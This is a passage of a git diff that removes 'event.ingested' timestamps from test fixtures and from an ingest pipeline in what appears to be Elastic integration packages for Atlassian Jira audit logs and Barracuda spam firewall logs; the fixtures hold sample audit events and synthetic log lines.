"2021-12-24T00:58:20.169994909Z", "original": "{\"affectedObjects\":[{\"id\":\"10001\",\"name\":\"Version 2.0\",\"type\":\"VERSION\"},{\"id\":\"10000\",\"name\":\"test\",\"type\":\"PROJECT\"}],\"auditType\":{\"action\":\"Project version created\",\"actionI18nKey\":\"jira.auditing.version.created\",\"area\":\"LOCAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"projects\",\"categoryI18nKey\":\"jira.auditing.category.projects\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"i18nKey\":\"common.words.name\",\"key\":\"Name\",\"to\":\"Version 2.0\"},{\"i18nKey\":\"version.releasedate\",\"key\":\"Release date\",\"to\":\"2021-11-28\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":543000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -6111,7 +6027,6 @@ }, "event": { "action": "jira.auditing.version.created", - "ingested": "2021-12-24T00:58:20.169995643Z", "original": "{\"affectedObjects\":[{\"id\":\"10002\",\"name\":\"Version 3.0\",\"type\":\"VERSION\"},{\"id\":\"10000\",\"name\":\"test\",\"type\":\"PROJECT\"}],\"auditType\":{\"action\":\"Project version created\",\"actionI18nKey\":\"jira.auditing.version.created\",\"area\":\"LOCAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"projects\",\"categoryI18nKey\":\"jira.auditing.category.projects\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"i18nKey\":\"common.words.name\",\"key\":\"Name\",\"to\":\"Version 3.0\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":545000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -6181,7 +6096,6 @@ }, "event": { "action": "atlassian.audit.event.action.audit.search", - "ingested": "2021-12-24T00:58:20.169996370Z", "original": "{\"affectedObjects\":[],\"auditType\":{\"action\":\"Audit Log search performed\",\"actionI18nKey\":\"atlassian.audit.event.action.audit.search\",\"area\":\"AUDIT_LOG\",\"category\":\"Auditing\",\"categoryI18nKey\":\"atlassian.audit.event.category.audit\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Results returned\",\"nameI18nKey\":\"atlassian.audit.event.attribute.results\",\"value\":\"85\"},{\"name\":\"Query\",\"nameI18nKey\":\"atlassian.audit.event.attribute.query\",\"value\":\"\"},{\"name\":\"Timestamp Range\",\"nameI18nKey\":\"atlassian.audit.event.attribute.timestamp\",\"value\":\"2021-11-22T00:05:08.514Z - 2021-11-22T00:08:34.545Z\"},{\"name\":\"ID Range\",\"nameI18nKey\":\"atlassian.audit.event.attribute.id\",\"value\":\"1 - 85\"}],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539922,\"nano\":856000000},\"version\":\"1.0\"}", "type": "info", "kind": "event" @@ -6252,7 +6166,6 @@ "ip": "172.17.0.1" }, "event": { - "ingested": "2021-12-24T00:58:20.169997106Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"admin.user\",\"type\":\"USER\"}],\"auditType\":{\"action\":\"User login failed\",\"actionI18nKey\":\"jira.auditing.user.login.failed\",\"area\":\"SECURITY\",\"category\":\"login\",\"categoryI18nKey\":\"jira.auditing.category.login\",\"level\":\"FULL\"},\"author\":{\"id\":\"-2\",\"name\":\"Anonymous\",\"type\":\"user\"},\"changedValues\":[],\"extraAttributes\":[{\"name\":\"Current number of failed login attempts\",\"nameI18nKey\":\"jira.auditing.user.login.failed.count\",\"value\":\"2\"},{\"name\":\"Reason for failed login\",\"nameI18nKey\":\"jira.auditing.user.login.failed.reason\",\"value\":\"User couldn't be authenticated\"}],\"method\":\"Browser\",\"source\":\"172.17.0.1\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637955310,\"nano\":718000000},\"version\":\"1.0\"}", "kind": "event", "action": "jira.auditing.user.login.failed", @@ -6328,7 +6241,6 @@ "ip": "10.100.100.2" }, "event": { - "ingested": "2021-12-24T00:58:20.169997911Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"admin.user\",\"type\":\"USER\"}],\"auditType\":{\"action\":\"User login successful\",\"actionI18nKey\":\"jira.auditing.user.logged.in\",\"area\":\"SECURITY\",\"category\":\"login\",\"categoryI18nKey\":\"jira.auditing.category.login\",\"level\":\"FULL\"},\"author\":{\"id\":\"10000\",\"name\":\"admin.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=admin.user\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.100.100.2\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637955209,\"nano\":363000000},\"version\":\"1.0\"}", "kind": "event", "action": "jira.auditing.user.logged.in", diff --git a/packages/atlassian_jira/data_stream/audit/elasticsearch/ingest_pipeline/default.yml b/packages/atlassian_jira/data_stream/audit/elasticsearch/ingest_pipeline/default.yml index 05b6e111e62..d13826428a2 100644 --- a/packages/atlassian_jira/data_stream/audit/elasticsearch/ingest_pipeline/default.yml +++ b/packages/atlassian_jira/data_stream/audit/elasticsearch/ingest_pipeline/default.yml @@ -1,9 +1,6 @@ --- description: Pipeline for processing sample logs processors: -- set: - field: event.ingested - value: '{{_ingest.timestamp}}' - set: field: ecs.version value: '8.2.0' diff --git a/packages/barracuda/data_stream/spamfirewall/_dev/test/pipeline/test-generated.log-expected.json b/packages/barracuda/data_stream/spamfirewall/_dev/test/pipeline/test-generated.log-expected.json index 697493e060b..8902961fc79 100644 --- a/packages/barracuda/data_stream/spamfirewall/_dev/test/pipeline/test-generated.log-expected.json +++ b/packages/barracuda/data_stream/spamfirewall/_dev/test/pipeline/test-generated.log-expected.json @@ -4,9 +4,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361565502Z" - }, "message": "notify/smtp[avolupt]: 10.224.15.48 nto sse accept tur 3 illumqui 1090 1.2364 ivelitse ritin", "tags": [ "preserve_original_event" @@ -16,9 +13,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361569329Z" - }, "message": "inbound/pass1: etdo[10.173.228.223] ntsunti 1455282753 1455282753 SCAN nseq itinvol psa umq 0 31 psaq SZ:cer SUBJ:reveri", "tags": [ "preserve_original_event" @@ -28,9 +22,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361570529Z" - }, "message": "outbound/smtp: 10.104.162.169 eosquir orsi nulapari allow vol 4 uidolor nibus mipsumq \u003c\u003cgnaali\u003e: enatus", "tags": [ "preserve_original_event" @@ -40,9 +31,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361571721Z" - }, "message": "notify/smtp[iatu]: 10.57.70.73 dolo meumfug deny roinBCS 2 com 1060 1.2548 byC tinculp", "tags": [ "preserve_original_event" @@ -52,9 +40,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361572753Z" - }, "message": "outbound/smtp: 10.236.42.236 tconsec nsequat taev block untutl 1 llu uptassi tamremap tur", "tags": [ "preserve_original_event" @@ -64,9 +49,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361573772Z" - }, "message": "reports: REPORTS (enatuse.exe) queued as magn", "tags": [ "preserve_original_event" @@ -76,9 +58,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361574712Z" - }, "message": "inbound/pass1[sit]: avol[10.162.151.94] laboreet 1461457525 1461457525 RECV aquaeabi giatq quid", "tags": [ "preserve_original_event" @@ -88,9 +67,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361575670Z" - }, "message": "inbound/pass1: tempor[10.138.137.28] eip 1462692479 1462692479 SCAN lupta iusmodt doloreeu pori 7 8 ect SZ:reetdolo SUBJ:nrepreh", "tags": [ "preserve_original_event" @@ -100,9 +76,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361576607Z" - }, "message": "scan: ari[10.108.180.105] nsequat 1463927433 1463927433 block llam llamcorp ari eataevit 4 38 uovol dmi", "tags": [ "preserve_original_event" @@ -112,9 +85,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361577549Z" - }, "message": "inbound/pass1: [10.206.159.177] ididu 1465162388 1465162388 RECV ciunt turQuisa 10 74 lit", "tags": [ "preserve_original_event" @@ -124,9 +94,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361578570Z" - }, "message": "inbound/pass1[umdo]: sed[10.206.224.241] reetdolo 1466397342 1466397342 RECV olupta turveli 4 40 tatno", "tags": [ "preserve_original_event" @@ -136,9 +103,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361579751Z" - }, "message": "inbound/pass1: aveniam[10.82.201.113] essequ 1467632296 1467632296 SCAN taevi ender snulapar aedic 5 13 iumto SZ:aboreetd SUBJ:sun", "tags": [ "preserve_original_event" @@ -148,9 +112,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361580718Z" - }, "message": "reports: REPORTS (tem.exe) queued as ons", "tags": [ "preserve_original_event" @@ -160,9 +121,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361581686Z" - }, "message": "outbound/smtp: 10.110.109.5 ittenbyC aperi lor accept ipi 4 paqu eseru remeum #to#10.18.165.35", "tags": [ "preserve_original_event" @@ -172,9 +130,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361582624Z" - }, "message": "scan: dolore[10.195.109.134] eddoei 1471337159 1471337159 deny etM nimadmin ditautfu piscing 6 74 ostr rudexerc", "tags": [ "preserve_original_event" @@ -184,9 +139,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361583565Z" - }, "message": "scan[colabor]: iusmodt[10.21.92.218] lorumw 1472572113 1472572113 accept llitani inima tlabo suntexp 4 45 stiae SZ:nofdeF SUBJ:sunt", "tags": [ "preserve_original_event" @@ -196,9 +148,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361584711Z" - }, "message": "reports: REPORTS (tat.exe) queued as tion", "tags": [ "preserve_original_event" @@ -208,9 +157,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361585679Z" - }, "message": "reports: REPORTS (emp.exe) queued as aperia", "tags": [ "preserve_original_event" @@ -220,9 +166,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361586643Z" - }, "message": "web: Ret Policy Summary (Del:eritquii Kept:dexeac)", "tags": [ "preserve_original_event" @@ -232,9 +175,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361587593Z" - }, "message": "web: [10.45.25.68] LOGOUT (rehender)", "tags": [ "preserve_original_event" @@ -244,9 +184,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361588531Z" - }, "message": "web: Ret Policy Summary (Del:hil Kept:atquovo)", "tags": [ "preserve_original_event" @@ -256,9 +193,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361589473Z" - }, "message": "notify/smtp[tatn]: 10.18.109.121 ents pida allow idolor 1 emoeni 269 1.2857 utlabore ecillu", "tags": [ "preserve_original_event" @@ -268,9 +202,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361590399Z" - }, "message": "web: [10.19.194.101] global CHANGE orinrepr (conse)", "tags": [ "preserve_original_event" @@ -280,9 +211,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361591519Z" - }, "message": "reports: REPORTS (lumqui.exe) queued as itinvo", "tags": [ "preserve_original_event" @@ -292,9 +220,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361592459Z" - }, "message": "reports: REPORTS (usmodt.exe) queued as siar", "tags": [ "preserve_original_event" @@ -304,9 +229,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361593404Z" - }, "message": "notify/smtp[sci]: 10.116.193.182 snostrud nama allow data 1 ationul 2530 1.5361 commod adol", "tags": [ "preserve_original_event" @@ -316,9 +238,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361594346Z" - }, "message": "inbound/pass1: hitect[10.198.6.166] modocon 1486156610 1486156610 SCAN que atevel nsecte itame 0 38 lit5929.test quamnih", "tags": [ "preserve_original_event" @@ -328,9 +247,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361595291Z" - }, "message": "outbound/smtp: 10.198.19.111 aquaeabi lita adeseru accept amc 4 amest corp modtemp \u003c\u003crehender\u003e: iae", "tags": [ "preserve_original_event" @@ -340,9 +256,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361596263Z" - }, "message": "inbound/pass1: equat[10.77.137.72] ione 1488626519 1488626519 SCAN ihilmole eriamea amre rsita 8 56 uptat3156.www5.test tmo", "tags": [ "preserve_original_event" @@ -352,9 +265,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361597225Z" - }, "message": "inbound/pass1: vitaedi[10.128.114.77] temqu 1489861473 1489861473 SCAN edol colab ommodico quatD 4 59 neav6028.internal.domain agnid", "tags": [ "preserve_original_event" @@ -364,9 +274,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361598182Z" - }, "message": "outbound/smtp: 10.181.80.139 hitecto ents liquide allow tenatu 1 boN eprehend aevit aboN", "tags": [ "preserve_original_event" @@ -376,9 +283,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361599134Z" - }, "message": "inbound/pass1[ris]: uamqu[10.138.252.123] quioffi 1492331381 1492331381 RECV uptate ncidid quaturve", "tags": [ "preserve_original_event" @@ -388,9 +292,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361600080Z" - }, "message": "reports: REPORTS (aera.exe) queued as ate", "tags": [ "preserve_original_event" @@ -400,9 +301,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361601018Z" - }, "message": "inbound/pass1: [10.153.108.27] uir 1494801290 1494801290 RECV dol essecil citation", "tags": [ "preserve_original_event" @@ -412,9 +310,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361602118Z" - }, "message": "outbound/smtp: 10.120.167.239 gnido ratvolu olup deny nsecte 3 eveli eroi dtemp aliquide", "tags": [ "preserve_original_event" @@ -424,9 +319,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361603131Z" - }, "message": "inbound/pass1[ris]: nisi[10.105.88.20] ecte 1497271198 1497271198 RECV tinvolu iurer iciadese", "tags": [ "preserve_original_event" @@ -436,9 +328,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361604068Z" - }, "message": "scan: olupta[10.98.92.244] idolor 1498506153 1498506153 deny uta llumdolo nre ercitat 7 38 riosamn SZ:ept SUBJ:iumtotam", "tags": [ "preserve_original_event" @@ -448,9 +337,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361605014Z" - }, "message": "scan[sperna]: sintocc[10.185.107.75] tDuisaut 1499741107 1499741107 allow tate imvenia spi stquido 8 62 ptas SZ:pta SUBJ:tetu", "tags": [ "preserve_original_event" @@ -460,9 +346,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361605945Z" - }, "message": "reports: REPORTS (nevo.exe) queued as ide", "tags": [ "preserve_original_event" @@ -472,9 +355,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361606917Z" - }, "message": "notify/smtp[etcons]: 10.80.214.206 ate uiac accept officiad 4 quinesc 6218 1.5651 tur roi", "tags": [ "preserve_original_event" @@ -484,9 +364,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361607869Z" - }, "message": "notify/smtp[nof]: 10.48.34.226 ccaec ten allow isc 2 ntN 6179 1.2364 tateve itinvol", "tags": [ "preserve_original_event" @@ -496,9 +373,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361688315Z" - }, "message": "reports: REPORTS (etconsec.exe) queued as ios", "tags": [ "preserve_original_event" @@ -508,9 +382,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361722930Z" - }, "message": "inbound/pass1: tquov[10.211.93.62] mod 1505915878 1505915878 SCAN hilm ataevi com tnulapa 5 57 tiumt SZ:reetdolo SUBJ:norum", "tags": [ "preserve_original_event" @@ -520,9 +391,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361725661Z" - }, "message": "reports: REPORTS (uidol.exe) queued as mporin", "tags": [ "preserve_original_event" @@ -532,9 +400,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361727053Z" - }, "message": "scan: qui[10.199.182.123] entor 1508385787 1508385787 accept Sedutp utp ema rsitv 0 69 ntiumt iquipe", "tags": [ "preserve_original_event" @@ -544,9 +409,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361728052Z" - }, "message": "reports: REPORTS (tvolupt.exe) queued as eufugi", "tags": [ "preserve_original_event" @@ -556,9 +418,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361729089Z" - }, "message": "scan[pid]: illoin[10.130.38.118] uamni 1510855695 1510855695 block gnamal metMalo ntexplic archite 1 56 untu asi", "tags": [ "preserve_original_event" @@ -568,9 +427,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361730068Z" - }, "message": "inbound/pass1: [10.153.152.219] eumiu 1512090649 1512090649 RECV orumSe boree intoc", "tags": [ "preserve_original_event" @@ -580,9 +436,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361731044Z" - }, "message": "web: Retention violating accounts: rnatur total", "tags": [ "preserve_original_event" @@ -592,9 +445,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361732070Z" - }, "message": "reports: REPORTS (isisten.exe) queued as cusant", "tags": [ "preserve_original_event" @@ -604,9 +454,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361733219Z" - }, "message": "reports: REPORTS (naal.exe) queued as borios", "tags": [ "preserve_original_event" @@ -616,9 +463,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361734177Z" - }, "message": "outbound/smtp: 10.167.227.44 tali lillum cusant deny ender 2 oles edic seq tutlab", "tags": [ "preserve_original_event" @@ -628,9 +472,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361735114Z" - }, "message": "notify/smtp[atevelit]: 10.56.136.27 aperia ccaeca deny ttenby 1 amc 5163 1.375 orumSe ratv", "tags": [ "preserve_original_event" @@ -640,9 +481,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361736066Z" - }, "message": "web: [10.194.90.130] FAILED_LOGIN (siut)", "tags": [ "preserve_original_event" @@ -652,9 +490,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361737020Z" - }, "message": "inbound/pass1: [10.103.69.44] velitess 1520735329 1520735329 RECV naali uunturm temUte", "tags": [ "preserve_original_event" @@ -664,9 +499,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361741215Z" - }, "message": "inbound/pass1: aveni[10.29.155.171] uptatema 1521970284 1521970284 SCAN oeni tdol sit tiaec 6 23 oremagna3521.mail.home asiar", "tags": [ "preserve_original_event" @@ -676,9 +508,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361742249Z" - }, "message": "inbound/pass1: [10.145.193.93] nonp 1523205238 1523205238 RECV labo ulapar aboreetd", "tags": [ "preserve_original_event" @@ -688,9 +517,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361743231Z" - }, "message": "inbound/pass1[ama]: uatur[10.143.79.226] exeacom 1524440192 1524440192 RECV roidents tem dol", "tags": [ "preserve_original_event" @@ -700,9 +526,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361744211Z" - }, "message": "web: [10.30.25.84] FAILED_LOGIN (utlab)", "tags": [ "preserve_original_event" @@ -712,9 +535,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361745168Z" - }, "message": "inbound/pass1: [10.141.225.182] bor 1526910101 1526910101 RECV rauto ationev 8 57 uaUten", "tags": [ "preserve_original_event" @@ -724,9 +544,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361792198Z" - }, "message": "reports: REPORTS (dun.exe) queued as reprehe", "tags": [ "preserve_original_event" @@ -736,9 +553,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361795559Z" - }, "message": "web: [10.90.9.88] global CHANGE umexerc (oremipsu)", "tags": [ "preserve_original_event" @@ -748,9 +562,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361797321Z" - }, "message": "reports: REPORTS (amco.exe) queued as ssecillu", "tags": [ "preserve_original_event" @@ -760,9 +571,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361817089Z" - }, "message": "reports: REPORTS (olo.exe) queued as psumqu", "tags": [ "preserve_original_event" @@ -772,9 +580,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361818986Z" - }, "message": "notify/smtp[rationev]: 10.226.20.199 tatem untutlab allow eveli 2 lillum 7809 1.2000 uisaute imide", "tags": [ "preserve_original_event" @@ -784,9 +589,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361820077Z" - }, "message": "web: [10.134.140.191] global CHANGE nte (mvel)", "tags": [ "preserve_original_event" @@ -796,9 +598,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361821091Z" - }, "message": "outbound/smtp[conse]: 10.252.40.172 nimadmin isiu licabo cancel etdolor 3 dic cola amcor", "tags": [ "preserve_original_event" @@ -808,9 +607,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361822059Z" - }, "message": "scan[xea]: ites[10.126.26.131] nisiut 1536789735 1536789735 accept teturad perspici itation sequatD 5 24 isciv rroqu", "tags": [ "preserve_original_event" @@ -820,9 +616,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361823014Z" - }, "message": "scan[rExc]: iusmo[10.187.210.173] reetd 1538024689 1538024689 accept ulpa sitam rad loi 2 15 Nequepor SZ:eirure SUBJ:deserun", "tags": [ "preserve_original_event" @@ -832,9 +625,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361824315Z" - }, "message": "reports: REPORTS (orroq.exe) queued as vitaedic", "tags": [ "preserve_original_event" @@ -844,9 +634,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361825279Z" - }, "message": "reports: REPORTS (orem.exe) queued as rcit", "tags": [ "preserve_original_event" @@ -856,9 +643,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361826354Z" - }, "message": "scan[untincul]: ssecil[10.180.147.129] atise 1541729552 1541729552 allow umetMalo oluptas emvele isnost 2 5 ido emqu", "tags": [ "preserve_original_event" @@ -868,9 +652,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361827298Z" - }, "message": "notify/smtp[exeaco]: 10.99.17.210 olorsit tore cancel illu 4 turadip 688 1.7484 boreetdo undeom", "tags": [ "preserve_original_event" @@ -880,9 +661,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361828249Z" - }, "message": "notify/smtp[uov]: 10.230.46.162 sBono loremqu accept quunt 3 siuta 1107 1.2607 dquia temporin", "tags": [ "preserve_original_event" @@ -892,9 +670,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361829553Z" - }, "message": "scan[nimveni]: idi[10.96.135.47] rum 1545434414 1545434414 accept eporroq ulla iqu oin 1 55 cingel modocon", "tags": [ "preserve_original_event" @@ -904,9 +679,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361830537Z" - }, "message": "reports: REPORTS (atv.exe) queued as onu", "tags": [ "preserve_original_event" @@ -916,9 +688,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361831513Z" - }, "message": "scan: obeataev[10.139.127.232] nsec 1547904323 1547904323 cancel maperi agnaaliq tlaboree norumet 7 48 tin SZ:fugitse SUBJ:imad", "tags": [ "preserve_original_event" @@ -928,9 +697,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361832483Z" - }, "message": "inbound/pass1: inv[10.163.209.70] atu 1549139277 1549139277 SCAN lloin remipsum tempor citatio 0 57 mveniamq SZ:taedict SUBJ:edquian", "tags": [ "preserve_original_event" @@ -940,9 +706,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361833441Z" - }, "message": "reports: REPORTS (mipsamvo.exe) queued as eiusmod", "tags": [ "preserve_original_event" @@ -952,9 +715,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361834383Z" - }, "message": "scan[avolu]: Except[10.191.7.121] umetMal 1551609186 1551609186 accept sciun metcons itasper uae 2 21 uia iciad", "tags": [ "preserve_original_event" @@ -964,9 +724,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361835393Z" - }, "message": "inbound/pass1: [10.157.196.101] gnaa 1552844140 1552844140 RECV mod doei cipitl", "tags": [ "preserve_original_event" @@ -976,9 +733,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361836382Z" - }, "message": "web: [10.171.72.5] global CHANGE eprehend (asnu)", "tags": [ "preserve_original_event" @@ -988,9 +742,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361837316Z" - }, "message": "scan: eritatis[10.209.184.60] mquisn 1555314049 1555314049 cancel uto emUte molestia quir 4 18 emip SZ:ver SUBJ:erc", "tags": [ "preserve_original_event" @@ -1000,9 +751,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361838269Z" - }, "message": "inbound/pass1[dolorsit]: archite[10.143.228.97] isqua 1556549003 1556549003 RECV uta emo itq", "tags": [ "preserve_original_event" @@ -1012,9 +760,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361839233Z" - }, "message": "reports: REPORTS (ntexpl.exe) queued as dunt", "tags": [ "preserve_original_event" @@ -1024,9 +769,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361840212Z" - }, "message": "scan: plic[10.17.87.79] tetur 1559018911 1559018911 block amali ate idolor ratvolu 7 64 onse olorem", "tags": [ "preserve_original_event" @@ -1036,9 +778,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361841159Z" - }, "message": "web: [10.163.18.29] FAILED_LOGIN (nim)", "tags": [ "preserve_original_event" @@ -1048,9 +787,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361842186Z" - }, "message": "web: Retention violating accounts: erspi total", "tags": [ "preserve_original_event" @@ -1060,9 +796,6 @@ "ecs": { "version": "8.2.0" }, - "event": { - "ingested": "2022-01-25T11:54:29.361843187Z" - }, "message": "reports: REPORTS (billoi.exe) 